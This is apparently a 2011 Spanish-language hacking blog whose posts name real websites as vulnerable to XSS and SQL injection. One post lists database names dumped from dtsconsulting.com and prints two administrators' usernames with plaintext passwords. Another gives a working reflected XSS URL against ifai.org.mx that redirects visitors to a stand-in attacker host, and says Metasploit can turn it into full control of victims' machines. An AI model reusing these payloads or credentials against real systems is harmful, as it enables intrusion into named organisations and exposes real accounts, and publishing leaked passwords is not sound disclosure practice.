uvmnet.edu – Vulnerable a Xss
Url afectada:
Url web:
www.uvmnet.edu
Niyaz
Niyaz-Blog
Seguridad, tutoriales
dtsconsulting.com – vulnerable a sql
Missão
Oferecer ao mercado corporativo, o melhor em Consultoria, tendo com o objetivo o aumento da produtividade e competitividade de seus clientes.
Empresa
Com mais de 3.000 consultores especializados, atuação no mercado desde 1983, Know How e experiência internacional, a DTS é uma das 10 maiores provedoras de Consultoria em alta tecnologia e está pronta para trabalhar com sua empresa, ajudando-a em projetos inovadores que tragam vantagem competitiva em seu core business.
Com mais de 3.000 consultores especializados, atuação no mercado desde 1983, Know How e experiência internacional, a DTS é uma das 10 maiores provedoras de Consultoria em alta tecnologia e está pronta para trabalhar com sua empresa, ajudando-a em projetos inovadores que tragam vantagem competitiva em seu core business.
———————————————————
Dbs:
DTS
master
tempdb
model
msdb
ReportServer
ReportServerTempDB
Amigomouse
xpress
PCD
SistemaContas
SistemaCotacoes
StockCar
SAN
DicMaxInst
Mundo_Cobol
DTS
NovoTravessia
TravessiaSistema
intranet_amsw
Winzip
sg
sg_dts
Katalogo
strattus
————————————————–
Db: DTS
Table: Adm_Admin:
Usuario: danielt Contraseña: 20danielt06
Usuario: marciadts Contraseña: dts82latin
——————————————————————
Esto entre otras cosas interesantes
Saludos
By Niyaz
por que tanto Xss o Cross Site Scripting??
Son muchas las cosas que puede hacer con un Xss, desde obtener una cookie, infectar, redireccionar a una web maliciosa, etc.
Pero hay algo mas que se puede hacer, como en este caso poder tener acceso al equipo de la victima y tener un control total de ella.
Esto es muy sencillo con el simple uso de Metasploit, en este caso no voy a dar mas explicaciones de como hacer esto, ya que es algo sencillo:
Simplemente ingresando un codigo a la url:
http://www.ifai.org.mx/buscador_ifai/buscar.do?type=all&spell=true&lemmatize=true&fuentes=4&queryStr=<script>document.location=”http://www.atacante.com”</script>
Mas que nada esto es para poder mostrar la gravedad de esta “simple falla”.
Esto principalmente afecta a los clientes de dicha web.
Feliz día de la seguridad informática!!
Como hoy bien sabemos se celebra el día de la seguridad informática. Actualmente ha aumentado el numero de ataques informáticos, por descuido de los administradores o por el simple hecho de no darle importancia y querer pagar por esos servicios.
“No debemos descuidar o dejar de darle importancia a una falla por mas mínima que sea”
Saludos.
Palacio de hierro vulnerable a Xss
Url afectada:
Url web:
Información
Change this sentence and title from admin Theme option page.
Recent entry
- 2011-12-01
- uvmnet.edu – Vulnerable a Xss
- 2011-11-30
- dtsconsulting.com – vulnerable a sql
- 2011-11-30
- por que tanto Xss o Cross Site Scripting??
- 2011-11-30
- Feliz día de la seguridad informática!!
- 2011-11-30
- ifai.org.mx – Vulnerable a Xss
